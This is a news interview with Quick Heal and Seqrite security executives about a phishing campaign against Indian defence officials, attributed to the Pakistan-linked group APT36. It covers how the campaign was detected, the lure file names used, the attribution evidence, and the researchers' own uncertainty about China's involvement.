A Pakistan-backed hacker group is reportedly behind cyberattacks that have been targeting officials of the Indian defence forces. The attacks are being carried out in a coordinated attempt to steal critical infrastructure and strategic data by sending phishing emails. According to cyber security researchers at Seqrite, the cyber security solutions arm of Quick Heal, the hackers based in Pakistan, are being backed by China to gather intelligence against India. The Sunday Guardian spoke to Himanshu Dubey, Director, Quick Heal Security Labs, and Sanjay Katkar, Joint Managing Director and Chief Technology Officer, on these recent attacks. Excerpts:

Q: How and when did Seqrite discover this cyber operation?

A: A couple of months ago, Seqrite’s next-generation behavioural detection technology alerted on a few processes running executable HTA files on non-reputed websites. Besides, the researchers noticed that attachments had interesting names such as “Defence Production Policy 2020.docx.lnk”.

These factors alerted us to go for an advanced investigation phase. Upon probing further, Seqrite researchers found that these attacks were targeted at Indian defence units and armed forces’ individuals.

Q: Has Seqrite been able to identify the extent of the number of victims affected in this operation?

A: So far, we have successfully detected and blocked these attacks on over 200 systems where Seqrite is present across India. The attacks are gradually increasing.

Q: Where did this attack originate from? And what is the proof to substantiate the origin?

A: Based on the evidence captured in the attribution section of the whitepaper, the attack is likely being carried out by a sub-group of the notorious Cyber Attack group–APT36 aka Transparent Tribe, which is suspected to be based out of Pakistan. For attribution, we considered several factors, some of which are: The infrastructure used for Command & Control servers; registered domain naming patterns and recently created domains; command and control server names are similar to the names used by APT36 in past. One domain that hosted HTA stagers was registered to a user in Rawalpindi, PK. APT36 has a history of APT attacks on Indian defence organisations.

Q: Would you agree that using titillating images and file names are one of the most used bait to target intended victims?

A: Yes. In targeted campaigns, these social engineering techniques are highly prevalent.

Q: You have mentioned that China was also involved in this operation. Can you elaborate on this?

A: We are not sure about China’s involvement. Taking the ongoing conflict and the targeted organisations into account, we are considering the possibility that China might have influenced this attack.

Q: This is not for the first time that such an attack, originating from the other side of the border, has taken place. What makes India so vulnerable to such attacks? Are companies, government bodies not spending enough to secure their networks?

A: Cyberattacks against Indian organisations originating from neighbouring countries are not unique. In fact, advanced cyberattacks, potentially backed by the nation-states, are no longer a novelty; and almost all countries across the globe are facing this threat. In current times, securing infrastructure and data requires continuous evolution and a robust cybersecurity strategy, not just in India, but on a global level. Our observation has been that cyberattack and cybersecurity awareness among end users is lower in India compared to developed countries.